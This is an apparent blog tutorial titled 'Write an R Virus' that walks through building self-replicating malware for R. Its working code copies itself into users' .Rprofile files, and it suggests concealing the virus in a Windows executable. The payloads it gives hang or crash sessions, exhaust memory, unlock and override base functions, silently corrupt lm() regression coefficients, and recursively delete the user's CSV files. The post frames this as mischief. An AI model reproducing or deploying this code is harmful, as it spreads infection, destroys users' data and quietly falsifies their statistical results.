Write an R Virus

Siqi Zhang

2018/09/27

Categories: R Tags: Programming

A computer virus is a program that can replicate itself and do damage.

This is not very hard to accomplish with R, as I will demonstrate in this article.

Replicate

The virus exploits R’s initialization script, .Rprofile. When R starts up, it looks for this file in the current working directory and then in the user’s home directory, and runs everything in the first one it finds:

{
    function() {
        rp_paths <- c("~/.Rprofile", paste0(getwd(), "/.Rprofile"))
        inject <- function(rp, code) {
            write(code, file = rp, append = FALSE)
        }
        lapply(rp_paths, inject, code = deparse(match.call()))

        cat("Wow, your R is Rancid!!!\n")
    }
}()

When the above script is run, it makes a copy of itself through deparse(match.call()) and overwrites the .Rprofile files. The next time you open a new R session, everything in the script above is run again. Right now, our virus does nothing but print a message at the end of your startup banner.

...

Type 'demo()' for some demos, 'help()' for on-line help, or
'help.start()' for an HTML browser interface to help.
Type 'q()' to quit R.

Wow, your R is Rancid!!!
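The self-copy step hinges on deparse(match.call()), which turns the call currently being evaluated back into text. Here is a minimal, harmless sketch of that mechanism. echo_call is a hypothetical name used only for illustration, and nothing is written to disk.

```r
# echo_call is a hypothetical helper, not part of the original script.
# match.call() returns the call that invoked the function, with argument
# names filled in; deparse() converts that call object to character.
echo_call <- function(x, y) {
    deparse(match.call())
}

call_text <- echo_call(1, y = "a")
print(call_text)
```

Because the function in the script above is anonymous, the deparsed call should carry the whole function body along with it, which is why the copy is complete.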

Any project the user starts is going to have its project folder infected. Likewise, if someone copies the R project folder to another computer and starts R from there, their home folder is going to be infected.
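Since both the project folder and the home folder matter here, it can be useful to see which startup files R would consider. The sketch below only lists candidate paths and whether they exist. profile_candidates is a hypothetical helper name, and the lookup order is taken from R's ?Startup help page (the R_PROFILE_USER environment variable, if set, takes precedence).

```r
# profile_candidates is a hypothetical helper for illustration.
# It lists the places R checks for a user profile, in lookup order.
# Read-only: no file is sourced or modified.
profile_candidates <- function() {
    env_path <- Sys.getenv("R_PROFILE_USER", unset = NA)
    paths <- c(
        if (!is.na(env_path) && nzchar(env_path)) env_path,
        file.path(getwd(), ".Rprofile"),
        path.expand("~/.Rprofile")
    )
    data.frame(path = paths, exists = file.exists(paths),
               stringsAsFactors = FALSE)
}

print(profile_candidates())
```

Starting R with the --no-init-file or --vanilla command-line option skips the user profile altogether.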

As R is an interpreted language, this seems to be the only route of infection. To conceal our malicious code, a Shiny app can be packed into a Windows executable using a tool called RInno, which has Electron behind it.

Damage

It looks like the replication part of the virus is taken care of. What, then, are some malicious scripts that we can have fun with?

There could be countless ways.

One of the easiest things to do is to hang the user’s R session. It can be done as simply as putting it to sleep for a really long time:

Sys.sleep(1e9)

… like 30 years, give or take.
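The "30 years" figure is easy to check with a line of arithmetic. Assuming an average year of 365.25 days, 1e9 seconds comes to roughly 31.7 years:

```r
# Convert 1e9 seconds to years, assuming 365.25 days per year.
seconds_per_year <- 60 * 60 * 24 * 365.25
sleep_years <- 1e9 / seconds_per_year
print(round(sleep_years, 1))
```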

Or have R generate a really large vector of random numbers; this is also going to eat up the memory available to the user.

rnorm(1e9)

For me, 1e9 is quite enough. But scientific notation is your friend. Go big.
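Why 1e9 is "quite enough" follows from how R stores numeric vectors: each element is an 8-byte double. Here is a rough estimate, measured on a much smaller vector so the example itself stays cheap:

```r
# Estimate the memory needed for 1e9 doubles without allocating them.
bytes_per_double <- 8
n <- 1e9
estimated_gib <- bytes_per_double * n / 2^30
print(round(estimated_gib, 2))

# Sanity check on a small vector: about 8 bytes per element plus a header.
small <- numeric(1e6)
print(object.size(small), units = "MB")
```

That is about 7.45 GiB for the vector alone, before R makes any temporary copies.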

However, if R is rendered completely unusable, the virus isn’t going to travel very far. That’s not what we want. It is also a great idea to replace some good functions with naughty ones. Symbol bindings are locked in attached namespaces, but it is easy to undo that:

reassign <- function(sym, value, envir) {
        envir <- as.environment(envir)
        unlockBinding(sym, envir)
        assign(sym, value, envir = envir)
}
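To see what locking and unlocking a binding does without touching any real package, the same mechanism can be tried in a throwaway environment. This is only a sketch; toy and greet are hypothetical names.

```r
# A sandbox environment; 'toy' and 'greet' are illustrative names only.
toy <- new.env()
assign("greet", function() "hello", envir = toy)
lockBinding("greet", toy)

# Assigning to a locked binding raises an error, captured here as text.
locked_error <- tryCatch(
    {
        assign("greet", function() "hi", envir = toy)
        NULL
    },
    error = function(e) conditionMessage(e)
)
print(locked_error)

# After unlocking, the same assignment goes through.
unlockBinding("greet", toy)
assign("greet", function() "hi", envir = toy)
print(toy$greet())
```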

We can do the user a service by forbidding the library() function and suggesting a better option.

reassign("library", 
         function(...) warning("No man, seriously. Use require()"),
         "package:base"
)

The effect would be:

library(purrr)
## Warning in library(purrr): No man, seriously. Use require()

Now let’s try something more subtle and more bad (badder?). We first extend the reassign() function a little bit…

tamper <- function(sym, value, envir){
        assign(paste0(".",sym), 
               get(sym, envir = as.environment(envir)), 
               envir = as.environment("package:base")
               )
        reassign(sym, value, envir)
}

… and use it to slip in some bad code.

tamper("lm",
       function(...){
               model <- .lm(...)
               model$coefficients <- 
                       model$coefficients * (1 + rnorm(1))
               model
               },
       "package:stats")

Now when we build a model, the coefficients look normal but are completely off. You can compare this with the result on your own computer.

lm(mpg ~ ., data = mtcars)$coefficients
##  (Intercept)          cyl         disp           hp         drat 
##  6.198439921 -0.056143713  0.006718294 -0.010822692  0.396546509 
##           wt         qsec           vs           am         gear 
## -1.871770126  0.413640331  0.160088906  1.269690310  0.330197079 
##         carb 
## -0.100467421
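One way to make that comparison without relying on lm() alone is to solve the least-squares problem directly from the design matrix. This is a sketch, and it assumes model.matrix() and qr.solve() have not themselves been replaced. In an untampered session the two sets of coefficients should agree.

```r
# Solve the least-squares problem directly and compare with lm().
X <- model.matrix(mpg ~ ., data = mtcars)
y <- mtcars$mpg
beta_direct <- qr.solve(X, y)

beta_lm <- coef(lm(mpg ~ ., data = mtcars))

# TRUE when lm() returns the genuine least-squares coefficients.
agree <- isTRUE(all.equal(unname(beta_direct), unname(beta_lm),
                          tolerance = 1e-6))
print(agree)
```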

In tamper(), we saved a copy of the original function in the base package, hiding it by prepending a . to its name. If we didn’t do that, we would have created an infinite recursion through self-reference, such as:

reassign("paste",
         function(...) paste(...),
         "package:base")
paste("foo", "bar")

Running this crashes the R session. If the user didn’t save their documents before setting off this bomb, that is obviously too bad. It is another way to create trouble.
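The difference between the two approaches can be seen in a throwaway environment, where nothing outside the sandbox is affected. In this sketch, toy, twice and .twice are hypothetical names. The wrapper calls the saved original instead of calling itself, so it terminates.

```r
# Sandbox environment; all names here are illustrative only.
toy <- new.env()
toy$twice <- function(x) 2 * x

# Keep the original under a dotted name before replacing it.
toy$.twice <- toy$twice

# The replacement delegates to the saved original, not to itself.
toy$twice <- function(x) toy$.twice(x) + 1

result <- toy$twice(3)
print(result)
```

Had the replacement called toy$twice(x) instead, each call would invoke the replacement again and never reach the original.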

Further Damage

There are yet more ways to continue our streak of mischief. For starters, how about deleting every csv file the user has in the working directory?

file.remove(list.files(getwd(), 
                       ".csv",
                       recursive = TRUE)

Doing something on the file system is a big step forward from just messing with their R session.

From annoying to destructive, the level of naughtiness is limited only by your imagination. With some deliberation, you can ruin someone’s life in a very meaningful way.

Here are some further ideas:

Note
You also have the choice of putting any of the malicious programs in .First() and .Last() functions, which will run at the beginning and the end of a session. See the R Manual for details.

More on .Rprofile: Fun with .Rprofile and customizing R startup